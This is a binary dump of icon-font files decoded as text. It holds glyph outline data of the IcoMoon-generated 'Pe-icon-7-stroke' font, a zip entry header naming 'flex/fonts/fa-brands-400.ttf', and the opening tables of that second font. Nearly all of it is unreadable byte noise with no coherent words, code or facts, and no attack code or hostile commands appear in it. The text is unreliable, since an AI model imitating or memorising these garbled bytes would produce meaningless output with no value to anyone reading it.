���

  +��#<U267>54&'.#"35#3#35#"3267>54&'.#"&'.5467>32#



3E,N!!N,,N!!N,)GG))GG).



#�;!N,,N!!N,,N!�gG))GG))G*��
#5#77'3535335'#5##57UE<��ֈ""xDx��"UfU���U"f<���D""D��ww̚��ww����
3��2M\x�����"3267>54&'.#"&'.5467>312#?'>7>54&'.'7.'.'7'.'.#1"'>7>32'>7>7.'.5467>77.'.'7381267>7#"&'.'7'>7>7*K  K**K  K*#

##

#fA@8@
+	
I+



+



�+
@
	CA@@	*	
I,+



�*	@
	� K**K  K**K ��
##

##
�+


+

:+
@
B@@@
+
I+

+


�+
?
	CAA	?
+	
+��1dq"3267>54&'.#"&'.5467>32#"3467>323467>7>7>54&'.#"32654&#,N!!N,,N!!N,)GG))GG)							





�!N,,N!!N,,N!�gG))GG))G4
				

		
�



+��%#####5##5#1!5�UUUU���w���ff���3��
!!''!5777!3��f�qMU32x��54UMm����f�J�=x":?��="v=�������r����""&#"'>54&'.#".#"3267>54&'.'732673267>54&'.'7:3267>54&'.#"&'.5467>32#7"&'.5467>32#"&'.5467>32#"&'.5467>32#�	P
Q		V			V
P		P		��



�



�



o



�	�C
	�			�C			
�		�3
		
�				w	

	"	

	+��(1FU%4&'.'1#13267>7178175>7>5'5"&'.5467>7#7'7� K**K !N,
 "�4"�)GD'p

uh�
�+L""L+,N!&2OC�*��G)'F Ǥ'�C-#
+��*9GUdx�������':81818#"32018181267>54&'.#267>7#5=#'"&'.'>7>7#467>73#>7>7.'.'3;".'.5.'.'>7>352=3.'.#73.'.'>7>554&'.'>7>7#7.'.''.'.'>7>7>7>7.'.'>7>7,M!!M,,N!!N,	LM	^]		]M	ML]^		^&


�	

^

	
�


�!N,,N!!N,,N!	M\
\\
mM	M

M	^\
\\
mM	M

�
	
6	


��
	

6	


f����
37#773#7,a�a��q�q��ճ�<���"�uKMf%#.'.#"'&".'.#"#";3267>5<573267>732654&#"&'.5467>32#!"&'.5467>32#�$"

"$$''$�� 

 !!!! 

 �"





""
'

'
"g        3��)26Ohqv{>7>54&'.#".'.#"#!##537'3'#772#"&'.5467>3467>32#"&'.573#533#553#i			



			d�dS�
*%��

<

�

H%*
�����ų�F
	

	
��D��H@"V

3

E@H��������31��$4?#54&'.+"3!267>=4&'.#%46;232!5!"&=!#��VV��
V
�
��g��
x
d	���
	


<��
��
f$��+[0#"&'.'.'.#"35>32326?5#"&'.'.'.#"5>323267>7�+$
					
%						
&.		
					

						
	
�
������"��
%#5'!'357!3f���UD���������˛k��
'#!1'#533!���*�qq�w�����f	yqq��x��3��#5#357'737355#35#7'#35#��zz�czz��z�cz�zzc���czzzzc���zc�znzz�3��	735#73#5%35#37%35!#33����3�l~}��x�������3�~~bͼ���<��4Pi��4&'.#"3>7>5"&'.5467>32##3267>54&'.'"&'.5467>32#75#35>7>54&'.'"&'.5467>32#�	

*				��
	
					�	



�		��#



�#��		D



恁��D



^����"C%4&5'113267>54&'.'"&'.5467>7041701#��x;"";�5}}5��"�	

!;;!

	�4
		��		
4+O�q*#!5'3##"&'.5#7!533267>73x�^�]��M�

�N4�xy





yqf��fU		U��
		
�U=��7'#73!35#!�WWB4o��o�VWWB����"��E	 ��$).38!33#!5#5335!!'#35#53;#553#53#5!!5!!5�4"��"��"3��f�ffDD4wwwwww������++3��"���ggVEEV+^3"��
7P%!377'53!!''777'"3267>54&'.#"&'.5467>32#�D�PQQP�U��f�3"5'0$7/]



u3��!----!"���GBk�dbGL�$	

	V

3��
#!!'#53!33533#53#53#5w���V"��g��V�
L�w������fDVxx��x��L��V44�33��	'\!!!5!!!3#5;#5#335#"735#37>32#"&'.=#3267>54&'.#3��f���x��x��o�m!d8F




��f�MM����^�_�(H



��2@P]0"+1!*1"5#35#5>7>57>54&'.#'.546320313#"&'.=!7532032�1��
K2D�D2K
��?	2//P?2	�
K3��3K
m?
\//ooR?\
��#(3'3#!5#%7!3#33#33#33#33#�D��>"�"������33D33D33D44E33���nn�������+��%7'!5##3!3535#!!���33"DD�����X
33��44������F�z!,7<AR!"3!267>54&'.#!!5#!"&=!%5463!2!3#553#5326=4&+"3�f		�		�^��V��f��V��V"��ff3"

"

z
�


E""�����3D	

	B��	
"'##!53'#533##55'#533#�W�hhW>>��V�>>VVE�VVjVE��E%>>>�iYV��R>>���V4V��+��Xq��73#'#5'.'./'7'.'./#537>7>?'77>7>?53267>54&'.#"3#'#3735>7>77'>7>735#.'.'7'.'.'51"&'.5467>32#1

$,-!$!	
4
	!$!-,$

4



+V!<!/1#<$
V
$<#1/!<!+



�)$	

4
	!$!//!$!	
4

	$)��



"- <!
V$<$33$<$V
!< -��



3����*C\aei>54&'.#"3267>54&'.''2#"&'.5467>3"&'.5467>32#'?77'7 		%? K**K ?% 



'DD''DD'f�B�AJ+R'8,R&�		$E&+J  J+&E$6
		
�DD''DD''DUB�A�w,'S ,&R3-��3@MZ!";53267>=4&'.#+'#"&=463!2'"32654&#3"32654&##"32654&#����C#
4+�

V
�



D



�



��
DD
��
,,
�

ހ











<����%).38%35!3267>753#5"&'.=!#!5!3#5;#5'3#5�D�x;" :33�5"5�D��U�E���";8 xgg�5oo5"�MMMMff>�;n20132+!"&'.5467>?>7>327>7>35".#"3!267>54&'.#4654&'.#1*

��	
		
%
			

%="

"0q)




			

	
%
#"

03��17"3267>54&'.#"&'.5467>32#5#35#*K  K**K  K*'DD''DD'fw� K**K  K**K �wD''DD''D��+��1H"3267>54&'.#"&'.5467>32#'&"326?64'&",N!!N,,N!!N,)GG))GG)k�09��!N,,N!!N,,N!�gG))GG))G�09�+��5!333535#5!###'#5!U�ր�D*����o�*7�5��DD�U�oU�77����6Ohm!'#33267>54&'33267>54&'.#1#'37#"&'.5467>323#"&'.5467>32/!#�PCS		x			��E��
		
�				�)J:�Fx��
		

			"��

		

		^��+>��+Haz��#'0"9.+"1#"3!267>=4&'.##!"&=46;77>;232'"3267>54&'.#"&'.5467>32#5"3267>54&'.#"&'.5467>32#�F)
U
(H

f


��

OU.N
�((((#

##

#







O)(���

�
.
��((((�
##

##
�



�



3����L�"&'.'.'.5467>?>32367>13>321#"3267>76&'.'.#"'"&'.'.'.7>7>?64'.'.#w0?*
		 
	
7
�	

(=+			4!	;(&@.	C

	)"%

�	+>%'9		
#
$)
Bf��	&7>ELSZaho35#73#57#";267>54&'.#+"&546;2'5#35#5#35#5#35#75#35#35#35#5#35#5#35#35#35#�������

�


�

�
�D"D"D3D3DwD"D3D>DD3""<��V��

V

���3DU3DV4E�3D3DU3DV4E��+��	!!!5!!!!!5#3#5;#5+��V��x��x��x^��E#��V�DD�x3��o����'7'''77��������	��������QT��SS;��JJ��+HHHH�JJ��3 ��
/@!3!35!!!5!3267>=4&'.+"3'46;2+"&=�fx"��V��x�||	|		|	�o��o���MM�%+��5FW#".+";201235154630213267>54&'.#46;2+"&5!+"&546;2��

�

�		�

��
�

�
�
�

�
�
��

	

"
��"

��



"

��SmKU^|��"'35##'35#01.'.#"3267>7326?3267>54&'.#'#.'.'7#7"&'.5467>32;#7'3"&'.5467>77'>32#�	* <�9$	#

#!
FN

##

#�>3@L

&O

�>�G�

$$


S"&?
#"


�4

"



"#
&{	6{6V

C		[{{[

	HG

3��0>%54&'.'54&+"!5'!575467>32267>5#3�,

,<�<+��</.<�	V	��0

0�00;1�..�1M		qOCQ;5#"#"&=46;%4&'.#54&'.+32+3267>=267>552#	��	���"
	����	
36�	�	���^#	�	#"D+��&@N\v�"3267>54&'.##>7>7'2#4&'.'>7>3#>7>73.'.'"&'.'>7>53#7.'.53,N!!N,,N!!N,ę#
�

	
4
	

`�
#d�#
�

	
4
	

`�

#�!N,,N!!N,,N!�+'#0�),,)'+0#�*'"0�),,)'*0"+>��#3.'.+'77524&'.'5�,E43����;4
YOaF;(Epp!��U0+P%&6V��!!3#5"32654&#����n�		��p�"��]�ww� ����>W%'7>7>54&'.#".'.'7'73267>77467>32#"&'.5�"L2	3
				

	3	.L"
$;! :$
��

XF+3		
	



	
		��*F220-*��	!!!!!!57!!5�4��V��g��x"D��h��U��3��g"+��*COZfrx"73267>77'>7>54&'.#"&'.5467>32##"3755467>;17#354&'.#1'132#35#'D,
+
$$
*,
D'#??##>>#M3
pf		"�3p
Df"		�^p�E'"
5446"'E��>#$>>$#>�
3pf"		p3
wf		"x�3-��!3!'37#%#'#5!�f�X4X���tt�0�33�x��ff����f<<����aA77'7'�
UTTTTU
TA
TTTTTT
U+��1=3267>54&'.#"#"&'.5467>32'77'7'iO))OO))O"H&&HH&&H�
UTTTTU
TwO))OO))O��H&&HH&&H�
TTTTTT
U��`'77'`TT0`
UT0*��19%267>54&'.#"32#"&'.5467>3'77',N""N,-M""M-(HH()GG)aUT0!N,,N""N,,N!�G)(HH()G�`
UT0��?@%7'73aTT1�`TT0*��1973267>54&'.#"!#"&'.5467>327'7*"M-,N""N,-M"�H()GG)(H�aTT1�,N!!N,,N""N,(HH()GG)aUT0��-@77'7'�`TT0�`TT0*��19%4&'.#"3267>5!467>32#"&'.577'7'�"N,-M""M-,N"�fG)(HH()G�`TT0�,N""N,,N!!N,)GG)(HH(`TT0��`77''�`TT0�aUT0*��19"3267>54&'.#"&'.5467>32#'7''-M""M-,N""N,)GG)(HH(
aUT1�"N,,N!!N,,N"�fH()GG)(H�aUT06�	y7'7'#57<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#�ML88�1$		
	
%oo

	
	
*

xx"

#�
LL7��7i1


%


			*


##
���	y%'75377<54&'.#".#";5#"&'.5467>?>7>327>7>320132+3267>54&'.#ALM88b0$
				

&oo

		
*



xx"



"JLL8��8�1


%


			*





"#

A�16<DLQV[`"3267>54&'.#"&'.5467>32#'!5!!5!!5#!5#!5#!5#3#53#5%3#53#5






���m���qI���J�����2222
22224

T

���8��(��"�������5'7'7577'57'wflqk�yu�^^bb�flqk�yu��^^��bb��a�"',37'#5##3#33535#5'5!!!'7!%3#53#5�u33u��v22v���$$����$$��TT�TT+<:""v;;��vT)+2T**u�	��	!&+�3#53#553#5'5##!##53'3#53#5!!7.'.'"&5467>5>76&'4"14676&'.'#0"#3581025>7>7>54&'.'5'0&'<14656&'467>73101213<54&'
uuuuSSC�������""�����m�	




e2�33��q""2TT2""����K
				
			
��%/:S#7'7'.#"723267>5<57'.'.'7/77"&'.5467>32#�50�wY4>^D4_w_KG�K0

6Y....3`50kwZ4>`E4`__L
G�sM15B.--.��q�1|73267>54&'.#"72#"&'.5467>37'#"&'.5467>77'"3>7>323.'.#5267>72:!!::!!:�4444_
(F
'* J)
#	




	#

�!::!!;;!�4444��.F(3$.
(8*K#��5Pk#935151511'#53717>7>54&'.'7>7>54&'.'7>7>54&'.'�{_`zdTTd8D



4					
	
	
	
�bLKaa�b�NNvP?v�	

	





= $$ "&(#7-32,.56/0���w73:3:130233:3:13023:3265<54&'.'.'"&5467>7>76&'<1&676&'.'.+"0.'.'&45467>7>76&'041&676&'.'.+"01#467>7>7>54&'./.'&6715061516&'&67>7>731!5'467>7>7>54&'.5/.'&4=3<1536&'467>7>739#5H
Z		
Z	


	
	
				

�
		
	

��

	


u�
			
		
		
						
			



	
	**
	
		��i�"3267>54&'.#>7>7>7>='"&#"&'>7>737>7>321#"#"&'.'7.5<1063267>7.'.51.'.#"#3210.'.5467>32�)J  J)*I  I*n
			
			
		�9		

9C&'C
�I**II**I��!



				





	

 !! 
	&&CC&&��1:%4&'.#"3267>5!467>32#"&'.5%7'735�!M+,L!!L,+M!�mF((FF((FffQ�+M!!M++M!!M+(FF((FF(
ffR��I�w1Z%4&'.#"3267>5"&'.5467>32##32+3267>54&'.#.7777�1111ɀe11e� 77 �7777�11111177G�w\g������7'.'>7>'.'.3267#.'.'.7>7>73#3534&15#.'.5#35#'7'>%.'&67>76&'&'.'&67>763#5;#5!3#5!3#5��j-



(D

N262E��3$��




33�22��33P22�OKB	

:
	

	



PgD



f

]��7<AFLQW"#33267>54&'.#"&'.'35#>7>32#5#3=#37!!#531!!!!1�









::


���
������\��~�,				

�

3C�2Cv����?�~���`����1:7267>54&'.#"32#"&'.5467>37'#3�+M!!M+,L!!L,(FF((FF(
ffQ��!M++M!!M++M!�F((FF((F��ffR��JZd%1"1#"&'.5&6777>?7'7''7''326?>327.#"'7#"&'.5467'7-�
 !

/0HG0GG/0''�!"
�0v/

��



 
0/GG0GH0/&&�

�/v0v
��.Y3:377'7'..'.'645./?117>76.7>?'1.'./#"#"&'&	z��z#",�`Y3�	

,";	,"#z��z	&�aM*�3(���>7>312#"&'./1'.'.5467>7>7>32'.#"3267>7>54&/.'.#"'.'.5467>7"
		
�
cv	��

�	
				�			���

�dv��
	�		�	
		��



����	 >S73#53#53#5.'.#"#!#5467>32#>7>?!33.'.'53e���Ɇ��	
		���S
�	���
�	
��CC.		�L�&���
		
�n��"'%5#535#3##35#53#35#'3#5#533#53GuK�LuL�L�L�L�����놆�*��*����ۇ���������''5#9373717717537#31'515�r{`?kvc~��Ud{>�Vs�r]bLKkvd�uP?zNCZ`l��.�'AZs�>7>=#3267>54&'.''53353.'.#".5"&'.5467>32#5"3267>54&'.#"&'.5467>32#�
�
77 �ST



\1111$$%

%




" AA #		)77)	w0ss0D%J�|1111�
%$$%
�



��S�%4&'.+>7>54&'.#"#*132;267>54&'>7>54&'>7>54&'>7>5#32+32+32+1#"&'.'.+5:3:3267>7>7>54632134132#�
	�			9[


�


&o
	J	


g<
�
N
�
			�&!*E��1:"3267>54&'.#"&'.5467>32#'7'35#�,L!!L,+M!!M+(FF((FF(
ffR���!M++M!!M++M!�mF((FF((FffR����%I3#54&'.#"357'57'>7>5#5'.'.5467>32m~++

T*)

Q$$2		
%%
		CC2++"�;!**"^##/1�%

%��h�����"5467>;267>7#+"189.'.#"381267>7>7>3:3:1:323812654&'.#9"&'.'.'.+"#9"&5467>323267>7>7>32#%##33535#7"3267>54&'.#"&54632#7"3267>54&'.#"&54632#\


#
%


)/
		
/)
F					2					#
		

		
#��""""�				C					


&
#	L23

32L�%0FF0%�!""				"				"0��	#(-26:!!#535#535#535#53#3#535#535#535#537'5��\C22222222
��C33333333�uuCC���`��CCSDDTDDTCC�>_�CCSDDTDDTCC�DD''N��1f�	l�7267>54&'.#"352#"&'.5467>3>54&'.#181"813267>7465'0010101'>54&'.#818101*#81'>7>71>7>783>3:1263:3263:3201201"1"#0#'>70"1"#"*#"*1"#0#**1*#"&'.'<5<5<7<1467>781>7>781813267*1'#"&'.5467>32�				

�!M+7&!L,'F%d

	T
		$A"-	8dT'D 
S
8	
		
�				C				3
+M!(	

+M!A%<	
S
<#qh=	:C&

S

h�
	

0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>731211?''77,







	Y

Y	
	��

	
	

G,,,,,,,�	
		
		C*	
	



		*�+,,+,,,��1:73267>54&'.#"!#"&'.5467>327'5#!L,+M!!M+,L!�F((FF((F��ffR�+M!!M++M!!M+(FF((FF(
ffR��0��h��%.'.'.5467>7>76&'<#4676&'.'.+""#3:3:13023:3265<54&'!5467>7>7>54&'.'5'.'&65>5156&'&67>7>73121175##33535,







	Y

Y	
	��

	
	

CCCC�	
		
		C*	
	



		*�CCCC��	'@Yr!!3#!!'267>54&'.#"32#"&'.5467>3267>54&'.#"352#"&'.5467>3#"&54632�3++���o�!;;!";;"4444

��f���x��x��;"";;"";35555�U"��29HW735#3.'.#">7#3757>7>54&'.'5#73>7>32''7g0D'0&-2*
�:*<7;:�
	�O$)*#��=��g0(E0	
�9<6;+9�*3.&��
��
#**$������-C!!570513830292.'.#"0+81'7526324&'.'3!U��ͫUE2	(!{{4E/-

'�����@t:m
%-SS x/M
&!3$������ )6CP]jw��'.#"326764''7'77'789'#"&54632#"&54632'#"&54632#"&54632#"&54632#"&54632'#"&54632#"&54632�l��lL�mal`tlgmh�llll0T0�0U1\l��lL�lam`slglg�mllm�00�01	-��%>K�����7"3267>54&'.#"&54632#%"3267>54&'.#"&54632#7'.'.+"#333267>=33267>=354&'.'535#%>7>;2!7#"&'.=3!#"&'.=37!5467>3!2^











#	�<7			�		
7;��	�
��
	34

4�g
U
�

4



4

4



xD

D
ww
	?RQ��				�ff��'#'+7#'3'#7'353�d�d���UV�Y�WmW�Te����5xx	��ffggdddu�������1Mm"3267>54&'.#"&'.5467>32#74&'.#"3'>7>5#?'.'.5467>32�,N""N,,N""N,(HH()GG)E	
		
$�#
Y

	

�!N,,N!!N,,N!�gG))GG))G�	



		ff
	�O


	P��1Gc.'.#"'73267>?7'7>56&'#"&'.'.546?7'7>7>32�=#)�		$$	

�&!=

��		�A��M=	
	=�>#(�
##�'"=

��		�A��L>	

	=#�/T7>54&'.'.#"3#33535#5267>7'>7>32#"&'.'.5467�







EEDD
�	

		

	�6666
EDDE
�
	/0	/0Fz!&+0%#5#5##5###3335335353553##33#37#5324D�E3443E�D42�E""U""�""4##�f+��+ff+��+fg��+����+������ %'7'777''7/7''7��

�	^��]�y``*sar`=`_�
��	^��^	�yaa+r`r`�aa����Vdiw%4&'.#"33151"5467>32.'.+32675#35>7>7>7>5<515.'.5467>7#5375�"N,,N"
%
H()G


VU&	��				�33f				�,M""M,W&�&(HH(&
�
	3
W��F�
����HWp������%5#4&'.'7'.'.'5#'#3735>7>77'>7>53'#.'.'7"&'.5467>32#7.'.#5'"'>7>7#>7>73.'.573.'.'5267>77'>7>73�<
**  ++<<
** !++
>MfI	�

sJ	
{J
vIf	+fH
7H	
{	H
vHf	� ++::++ !++=<++ 
H

<�Ii
-hI	9H


|	H
tGf
,fH
8G

+�&6F535!3#!5#54&'.'>7>5#5467>7'.'.=3�,��+
	"!

	++,	

!"		�	
##
	Z#	
�	
#?ee


XX


�XX

q	ee	���?%4&'.'35>7>557'5#'.'.5467>700--�6*,8'++'�+K !::! K+(5^^5(�B6*�Q,8�."%B55B%".��	"'?'3#5;#53#553#5'7'7/7���DD�EEDi0000�1
0��EDD�DD+11�11�00��&?7.'.#"3267>54&'.'77"&'.5467>32#���	555	�)�[//..��555

���(��/../����#(AJO%'5>7>54&'.#"'77557467>32#"&'.5'5357573	
	3��w���ff#				fw33wff�h		^8�8DD�D�)�*�B				��E�KB�<3�3�����,B'!!7'5815#*1">7>31021021358=!3>7>3:7ޫ���U�{{!(	13���'
./DQt@�w:SSS-%
 �hg$3 '
M.�����(8Ng�%1'54&'.#"3267>?3'%467>325#"&/.546?357#.103267>5&4'"&'.5<59>7>7#f�
F`	
		zi4�EĀ
a��G�34		6�

kG	
`{5�DZ̀`�l}��#IJ#		.				����*/45##;267>5#'3#5+"&'.533#5;#5��3
�
3xgg��͉4>����

www�t

��s++++��1J!!77!5!5!5''5!'267>54&'.#"352#"&'.5467>3��Uxv<Y�}��w�]<xx�^				

		��f���~w3Z �VVy`3w}��				E
		
������(A%#.'.'467>7.#&"'>54&'.#".'.5467>7'3267>?33:3>3326?>764/>7>73267>=.'.#%467>32.'.5+#"&/#*'./#*/.'&4?'.'.5467>3:27>7>732'#"&'.5467>32�
		
		

				



		

		��

		

^	


	

B&
	
	^�


		








	
		

			�		

�		

	


4

			
	8	$��1j������"3267>54&'.#"&'.5467>32#7>54&'.#"'>54&'.#".'.#"75''73267>54&'73267>73267>77#"&'.5467>32'2#"&'.5467>32#"&'.5467>3'557�				
		


�			
		
		&�� ��
	
	

	
ɼ�

�

U�����F				D				<						�bc�jV		
		U|				L				3				LW�X��W�X��!?C%7'>7>54&'.#2'7%467>7735"&'.57'7Hz0
 K*'D+8C��
4z' J+'D\
8B�}0
+J D'

-iD:
� 
5})#+J D'�D:
	��U�1MQajoty"3267>54&'.#"&'.5467>32#<5<54&'.'!'#73#5467>77#<5<53#5;#5#3#5�								U
  UUU�11��					11^+Vi				E	

	s0"
)$$*	#0jkZ??�"

"�??
aUU3333
����HR\fpz����%75'.'.'7'.'./#'737>7>77'>7>774654&5'.'.'7'3"&#"#77'57''7#'239263'"&'.5467>7>7>312#7'>7>7�DD&'3
@
5'%DD&'3
@	4''333N&�"�':33N%�" 8 8
�'�@
3'&DD%'5
@
4''DD&'6
8!
�&:33N&�"�&;33D8 8 
(D�%10>7>5<1'.'.=7'77'7'��>*+=��6&%7���3333333��.((.���(%

%(�؃4344344��1Vo�"3267>54&'.#"&'.5467>32#7&#"&'.'.3267>76&''#"&'.5467>323#"&'.5467>32�+J  J+*K  K*'DD''DD'j

!!�				�



� J++J  J++J �wD''DD''D�	

	\								����Vc|�#357'7'.=>7>54&'.#"3267>54&'.'57>=354632#"&5#"&'.5467>323#5�;;##6	
	C		
G�



�				+z;):�	::	��6(

(
C0		vG);g



��				^����hm����.'.#"73267>54&'.#"'.#"3267>74&'77'.'&677'>7>327''7>32#"&'&47#"&'.5467>327'7'7� 	A	R*T

A
***+

+))�O�rBAQ*T

A63***45)
))+���
��x����)41'7'77>?357'#"&'.'.'37!.7>?�YIH
�II530)�g/0�$5��
N��Z34HH�IH0)��	$6#
N�>s��_<�Вd~Вd~��������3++3UU^+3<*3<7G^+3+"33+fx+/3<++3�+"o3+U+++DU�++U+<++*3++3++f33f"k33<^+U"33+B+33<3+++3f+3+3++ +3�+�*�*�*�*�a��r��������������.�����������������#���+����������V�E����
��~�2nJ��t��	@	j	�

�J|��
z
�r��
��.P��6N��@��Jl�V�pF��Z��j��v�� ` �!!�""�#4%�&&�&�((�(�)*4*�,|,�-N..^.�//$/\/�0t0�11>1�22F2�3L3�3�4:4t5�6J6�77�88z8�9D:0;;�;�<<l<�=�>">�?^?�?�@L@vA$ALAfA�A�B4BHB�B�CC"C|D$D�EZE�E�F�G\HH�J�K�LL�M�NNlOO�PPP�QQ<RR�SVS�UUtWXXzX�Y�Z�[2[�\V]x]�^P^�_d_�_�`�a�b6b�b�c<c�dd�ee�gZh�ii�j�k2k�l�m�m���� � 6 � V
4�	 	�	 6	 �	 	 f	
4�Pe-icon-7-strokeVersion 1.0Pe-icon-7-strokePe-icon-7-strokePe-icon-7-strokeRegularPe-icon-7-strokeFont generated by IcoMoon.PK!��(�DDflex/fonts/fa-brands-400.ttfnu&1i�
�PFFTM�,�^(GDEF*�OS/21�V:X`cmap�!q���gasp��glyf���x�head�r�6hhea6�$hmtxqC��0loca�qb*��maxp5O8 name������postZGjY��kK�`ࡐ _<�۠�A۠�E��������������L'@��LfGLf��PfEd�������.�T:� �@ ��@���@������������������������@��������@���@�	�p��@����������@� �@����@��@
�����@
���@@@@@@���.�@
��@��������@����@@�	@@����������������� @������ ������� ����
�@���
����������������@�������������Lh�����@������������@�����P���� �����������������@ ������@���@���@������������@�����������@�����������@���@�������������������@@������@��������������������E��@�������������@�����������@@������������������	������@����������@@����00�����I�R�W������������6�<�Z�i�n�q�t�~���������������������	���2�7�>�L�^�k�n�p�~�����������������\�u�}�����������������������������������
��!�#�1�M�R�W�Y����������������������������?�B���������1�]�{����������������������=�B��������������I�R�U�w�����������6�;�Z�g�k�p�s�y�����������������������
��1�7�:�K�^�`�m�p�|�����������������\�h�x��������������������������������������#�%�M�R�W�Y������
�����������������������?�B���������0�]�z����������������������4�?����������������������QF���������������������~}qmjiOKI=,+*)
�
�
�
�
k
`
^
]
[
Y
W
V
U
S
R
Q
P
N
L
K
J
G
F
D
C
B
A
>
=
9
6
5
2
1
0
/



���q���������������VT
�
�
�
�
�
�
n
C
'




	�	�	�	�	�	�	�	�	�	�	(	!�����2���4������4��.|�		d
2
�
�N����

�6��0j�*J��4���r���2���"�`�*v���T��R��&R�Z��:x��p  Z �!$!�!�"##V#�$b$�%�&j'':'�'�(H(�(�)h)�**�,&,�.�/�0�0�1�1�2�2�3�44d4�5:6X6�77f7�7�8>8^:�;B;�<L<�<�=*=b=�>.>�>�?H@d@�A�A�B&BvC>C�C�D D:D�E$E�E�FF�G
G2G�H
HJHlH�H�IBI�JJ�KK�LL�MDM�N"NtO�O�P8P�Q<Q�RR.S6S�T$T�U>UxU�V�WTW�X:YYHY�Z[J[�\.]]h]�^__`_�`l`�aTa�b*bhb�b�c�d~d�d�g"g�hhNh�h�i i~i�jfj�k�ll,l�l�m*ooRpp:p�qq*qVq�t�u�vv�v�wTw�x(z�{n{�||�} }T~~�(ʀ�t�������"���J���n�d�܅t����R����h��&����d��$����(�N�Ѝ&�����b�J�t���Бx������d����`�ԘV�x���2��:���F���ОȠ\�z�����4�t���x���6�f���:�֨��N�����b��\�ެ��$�f�Ȯ4������b������L�������b��P�ڵv��<��ܸ���t��l�8�t�8����`Ř���^���B���ȆȲ���.��T��Φ�FԼ�Ֆ�(���������݄�ކ��>�����v�������8�h�*��8������h�����b�.�|�2���>������r��V�������#"&=6505656567676767>167#"3>&'6&'&#&'"'&'"'&'&#0&1&#0#"#"#"'454767>79305&'�_�Ze�	


 ,9(%
T
E.8B	Ws�e("
	/

*.?B	!Da($&$	 ��'�)5=IRV2"&4537+5323+532>54&+532#5#5#535#535#;'#373'2#!2654&+3#i))	OI�9�_
_�"m" 7� c>^5 
�y��pvym�K))荍�.D��S�E[

[[[�.@6mt��Ugeee�j	����>%3#0#&'&#"##"&4632'654#/&""32?32545'�3&)\��\<g;tH
H:;;V!&x�x7^7G_DD,E))E����
#7463!1#!>7>7>7>7  F1GE�1YXF1��
3/#
"%!<H1FZ9f��1F&4H) ����%/#'73?37'#7'�5�;��;��m�W��W�.**W�22�32��23ml���&�z�������,$#"&546301%!!%&'&#0#"3273 ����@w8
(��@KN


����#+;T62"&47"'&'&476762264&"6264&"72#!"&546364'.'&"27>�,,�	�		��D00D0�n��O0+\+0+\+0�,,H�		�		�0D00Dd���`��\+0+\+00����%#".?'&>32#"/&4?632s��\\
q��
\t��$}{$��$��${����$-9dj32'6123%>767676761232126'>'676767&4>767.&/7>'.767&'�7~#c��%
/&5		""
	7	/2	
%^

X����J4##0
	B!+)
�99&
,
-$

�!
@z#'%53'3#5353353353353%53!53'53�}}}}}��}}}}��}��}}}�II�H�IIeIIIIIIIIeIIIIeII����&7!67"'.5&736.'#>32��>W\Nb'4Dz�1X<zc@h�4-6	ib6�9!.+&5!];64?�A+IVgs|73#".'5&547>3032&#"1"32767#$#5##"'&505463254'&#"'6365&#"32'0+#53212654'&+321%3#7'33jc*
3(  9v


"
S'?	
	''O4%�1	
!


;O

	
g		�L�X

	A�@x\
�����9EQ^go���%#0#'#"#'#"/"#"/"#"/""/&##"/&##"/&##"5057&'"#"5457&'#"'&54?4/&54?4/&54?4/&4?65'&54?65'&54?67'&5476;67'45432367'54326?6322?6322?6237632376327232072327267#"&'.5&+32+723232?6324&#"32>'4.'#"26'35#&264&#"3254&+6=4;654/&54?.'#"/32&264&+"264&#"�
		

		� 	O0-� %*)$		�		
	X5	,	
		�;?�#D(>+�'


�	
�			�	

		
	�

	##6
	##"		
		
		�

x				(
	x	
		($0/
�

	�		
	����%%#"'"&4632&#"3265313�C7_�__D,",X
,%�'�D__�_Z,",]
4����%!533=#5��@�����}}�}}?�`/S%#!"'&5467&54632>321"13%2+"5057>?27454'&#'&'&?632�	
�U7'(O1#?*'�Q":"�'32	
	�
'8	(
-95""`":"	
��1!67#&'!".'&5���46Y'/7V),2+�++46%3
,!6S?H	"<$V����4D%2#"/041742'054;20+"01+"5417'054;221+"541743���nBoC�CCmBm�����������������1#"/72?6="'&'56?657'&"%62��		w��!���
�w��!�4
 �
_E�8WP���
_	
D�8WP������7%7'3'�3+tv���fgt �9���u�������Q%'&'.'&'.'.&'.>1'&76'.5&547>�
/3


		*"3;X	�G 5
c	@A L




	&9=
!D>
-:D %,����!1:%2+5'2+5%2#!"&54634&#!"3!262+51:b:!00!��!00!]%��%%%}:�b�ba0!��!00!!0��%%��%%(b
����"EMU]hs��7"/#1"/&=4?622#"/&=43254323327676"&4622"&4"&4622#"&4".5462"&54>3262#"&42"&46�tdKu�	ee
JJ



_

`


)


?
	�	



�DV
s:+E
�	::
+��+,



G

	

F



$

E
	;	
����+92"&47'&=7577.#"7'&?6>54/�ƍ�ƍj	g	-��V07_I	(!Y}�	��ƍ����!4Z�%#(3+#���Y h�
!1:LP7#'#'3733732#"&4254#"#".5463253#'"3254#5##"&=332=33#�%&-&#$;#"?�" � 
""	&&luu�ttvv,#$;E'('%>�f('(fLF#AW%����92#!"&54636767&#"&'&''3#"'32>54���/(S5	"$-	.79X)���`�
0!@#$:T-����$2+537#54;5&#"#3#"&5463��:E()??�����H/&=,7H�`����52#!"&546335#6264&"54.#"#5#354632�

��

gC  @!!@C�
��

�
�������u"�j
h	����V[cipw}�2#!"&5463>54&#"54&5".'&'0'43767.547&7662>&&364#"32&'&6'6&'6'&&6'&'6'"����2=aEE]>2	 	
	+
S
	���`��W7D]]D7W
 
		
	)
@	���0#"'327"&'327.=&547&546326767�(ItFXII:#5

	&/'q@=+.$"(	5iW6/-)+
 81:+>!%
 ����%537#54;5&#"#3.5462�xY:E()??Yx�Α�\��H/&=,7H��\g������emu}�7#54366'72&2&5<54'>54&'6'&&".&'./"2?'.5466'&'6'&6'&'6&�!(GDtC]K	$
"
A%	"

 
	L^�,	"	3�@pDS�? (%
			%!(
0�Sh���
!	����J#"'6?32654&#"7>76'&54632#"&7>54.#".5462�g&# 7IXALW=3.:$
GW��'Α(;YA=RX>9
"+A9,!4
$
		"	g.~Ng�����R+6?32>54&#"74676'&54632#"&7>54'&#"&5463!2�� %:!WAKW=2-:#
Y`p��$;(F*=QW>8!+@8, 4#		7 
`����+72#!"&54632654'#3#".546327&#"%5#5##335���t+5^9$');;���`��6,"%;R;Rt�'%#"&4632&#"3267#53##5#5353�fRPppPK54. 7 F126mn888778�Sip�p22 8!2G6C88888��'3#3'"&462#54.#"#33>32d]].  , |]!]Z
. "-	+) ,  ���*#�+))0!��
